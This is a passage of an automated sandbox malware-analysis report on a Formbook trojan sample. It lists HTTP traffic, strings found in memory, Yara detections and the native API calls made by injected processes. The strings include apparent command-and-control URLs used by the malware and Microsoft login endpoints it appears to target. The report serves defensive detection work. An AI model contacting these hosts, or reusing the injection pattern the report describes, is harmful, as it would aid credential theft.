to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website
            Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website/pp43/
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000003.2648034206.0000000007F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005408000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004478000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F9D8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukW
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C063 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2D00 NtSetInformationFile
